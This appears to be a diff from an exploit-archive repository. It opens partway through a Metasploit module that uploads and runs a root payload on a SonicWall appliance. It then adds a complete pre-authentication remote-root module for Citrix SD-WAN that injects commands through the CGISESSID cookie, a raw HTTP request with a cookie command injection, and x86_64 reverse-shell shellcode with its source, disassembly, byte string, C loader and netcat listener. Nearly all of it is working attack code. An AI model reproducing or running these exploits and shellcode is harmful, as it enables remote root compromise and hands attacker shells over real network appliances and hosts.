[ "loginSchedule", "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ],
[ "formsection", "main" ],
[ "doAdd", "1" ],
[ "cgiaction", "1" ],
[ "themename", "stylesonicwall" ],
[ "onlinehelp", "" ],
[ "tmp_currentVhostName", "" ],
[ "tmp_currentVhostAlias", "" ],
[ "tmp_currentVhostInterface", "ALL" ],
[ "tmp_currentVhostIp", "" ],
[ "tmp_currentVhostIPv6", "" ],
[ "tmp_currentVhostEnableHTTP", "0" ],
[ "tmp_currentVhostEnableKeepAlive", "1" ],
[ "tmp_currentVhostCert", "" ],
[ "tmp_currEnforceSSLProxyProtocol", "0" ],
[ "tmp_currSSLProxyProtocol", "0" ],
[ "tmp_currEnableSSLProxyVerify", "0" ],
[ "tmp_currEnableSSLForwardSecrecy", "0" ],
[ "tmp_currentVhostOffloadRewrite", "" ],
[ "restartWS", "1" ],
[ "reuseFavicon", "" ],
[ "oldReuseFavicon", "" ],
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
# assemble upload_req parms
upload_req.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
post_data << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-bin/sitecustomization",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Cookie' => 'swap='+swap_cookie+';',
}
}, timeout)
end
def run_command_file(swap_cookie)
# use prefix so exploit can be re-used (unique portalname requirment)
prefix = Rex::Text.rand_text_numeric(5)
run_command(swap_cookie, "#{prefix}$({find,$({perl,-e,'print(chr(0x2f))'}),-name,VirtualOffice.gif,-exec,cp,{},qz,$({perl,-e,'print(chr(0x3b))'})})")
run_command(swap_cookie, "#{prefix}$({chmod,777,qz})")
run_command(swap_cookie, "#{prefix}$({sh,-c,.$({perl,-e,'print(chr(0x2f))'})qz})")
end
def exploit
# timeout
timeout = 1550;
# params
password_clear = datastore['PASSWORD']
user = datastore['USERNAME']
# do authentication
swap_cookie = do_login(user, password_clear)
vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
# pause to let things run smoothly
#sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
upload_payload(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
upload_payload(swap_cookie, ("#!/bin/bash\necho -e \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m; /tmp/m"))
run_command_file(swap_cookie)
# wait for magic
handler
end
end
end

140
platforms/cgi/webapps/42345.rb Executable file
View file

@ -0,0 +1,140 @@
# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#
# CVE : (awaiting cve)
# vuln: CGISESSID Cookie parameter
# associated vuln urls:
# /global_data/
# /global_data/headerdata
# /log
# /
# /r9-1-2-26-561201/configuration/
# /r9-1-2-26-561201/configuration/edit
# /r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
# Description PreAuth Remote Root Citrix SD-WAN <= v9.1.2.26.561201. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix SD-WAN CGISESSID Cookie Remote Root',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Citrix SD-WAN Appliace Version <= v9.1.2.26.561201. The vulnerability exist in a section of the machine's session checking functionality. If the CGISESSID cookie holds shell-command data - it is used in a call to system where input is processed unsanitized.
},
'Author' =>
[
'xort@Critical Start', # vuln + metasploit module
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(443),
], self.class)
end
def run_command(cmd)
vprint_status( "Running Command...\n" )
# send request with payload
res = send_request_cgi({
'method' => 'POST',
'uri' => "/global_data/",
'vars_post' => {
'action' => 'logout'
},
'headers' => {
'Connection' => 'close',
'Cookie' => 'CGISESSID=e6f1106605b5e8bee6114a3b5a88c5b4`'+cmd+'`; APNConfigEditorSession=0qnfarge1v62simtqeb300lkc7;',
}
})
# pause to let things run smoothly
sleep(2)
end
def exploit
# timeout
timeout = 1550;
# pause to let things run smoothly
sleep(2)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
# upload elf to /tmp/n , chmod +rx /tmp/n , then run /tmp/n (payload)
run_command("echo -e #{encoded_cmd}>/tmp/n")
run_command("chmod 755 /tmp/n")
run_command("sudo /tmp/n")
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\\\x\1\2')
# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
run_command("echo -e #{encoded_elf}>/tmp/m")
run_command("chmod 755 /tmp/m")
run_command("sudo /tmp/m")
# wait for magic
handler
end
end
end

12
platforms/cgi/webapps/42346.txt Executable file
View file

@ -0,0 +1,12 @@
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
action=logout

View file

@ -0,0 +1,155 @@
/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - Reverse Shell Shellcode
;Author: m4n3dw0lf
;Github: https://github.com/m4n3dw0lf
;Date: 18/07/2017
;Architecture: Linux x86_64
;Tested on: #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
##########
# Source #
##########
section .text
global _start
_start:
push rbp
mov rbp,rsp
xor rdx, rdx
push 1
pop rsi
push 2
pop rdi
push 41
pop rax ; sys_socket
syscall
sub rsp, 8
mov dword [rsp], 0x5c110002 ; Port 4444, 4Bytes: 0xPORT + Fill with '0's + 2
mov dword [rsp+4], 0x801a8c0 ; IP Address 192.168.1.8, 4Bytes: 0xIPAddress (Little Endiannes)
lea rsi, [rsp]
add rsp, 8
pop rbx
xor rbx, rbx
push 16
pop rdx
push 3
pop rdi
push 42
pop rax; sys_connect
syscall
xor rsi, rsi
shell_loop:
mov al, 33
syscall
inc rsi
cmp rsi, 2
jle shell_loop
xor rax, rax
xor rsi, rsi
mov rdi, 0x68732f6e69622f2f
push rsi
push rdi
mov rdi, rsp
xor rdx, rdx
mov al, 59
syscall
#################################
# Compile and execute with NASM #
#################################
nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o
ld reverse_tcp_shell.o -o reverse_tcp_shell
#########################
# objdump --disassemble #
#########################
reverse_tcp_shell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 55 push %rbp
400081: 48 89 e5 mov %rsp,%rbp
400084: 48 31 d2 xor %rdx,%rdx
400087: 6a 01 pushq $0x1
400089: 5e pop %rsi
40008a: 6a 02 pushq $0x2
40008c: 5f pop %rdi
40008d: 6a 29 pushq $0x29
40008f: 58 pop %rax
400090: 0f 05 syscall
400092: 48 83 ec 08 sub $0x8,%rsp
400096: c7 04 24 02 00 11 5c movl $0x5c110002,(%rsp)
40009d: c7 44 24 04 c0 a8 01 movl $0x801a8c0,0x4(%rsp)
4000a4: 08
4000a5: 48 8d 34 24 lea (%rsp),%rsi
4000a9: 48 83 c4 08 add $0x8,%rsp
4000ad: 5b pop %rbx
4000ae: 48 31 db xor %rbx,%rbx
4000b1: 6a 10 pushq $0x10
4000b3: 5a pop %rdx
4000b4: 6a 03 pushq $0x3
4000b6: 5f pop %rdi
4000b7: 6a 2a pushq $0x2a
4000b9: 58 pop %rax
4000ba: 0f 05 syscall
4000bc: 48 31 f6 xor %rsi,%rsi
00000000004000bf <shell_loop>:
4000bf: b0 21 mov $0x21,%al
4000c1: 0f 05 syscall
4000c3: 48 ff c6 inc %rsi
4000c6: 48 83 fe 02 cmp $0x2,%rsi
4000ca: 7e f3 jle 4000bf <shell_loop>
4000cc: 48 31 c0 xor %rax,%rax
4000cf: 48 31 f6 xor %rsi,%rsi
4000d2: 48 bf 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rdi
4000d9: 2f 73 68
4000dc: 56 push %rsi
4000dd: 57 push %rdi
4000de: 48 89 e7 mov %rsp,%rdi
4000e1: 48 31 d2 xor %rdx,%rdx
4000e4: b0 3b mov $0x3b,%al
4000e6: 0f 05 syscall
#######################
# 104 Bytes Shellcode #
#######################
for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05
########
# Test #
########
In the asm source:
mov dword [rsp+4], 0x801a8c0 <IP Address (Little Endian) of the host that will receive the shell>
In the host that will receive the shell run:
nc -vvlp 4444
On the target machine:
compile with:
gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
run:
./reverse_tcp_shell
<!> gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
*/
#include <stdio.h>
unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}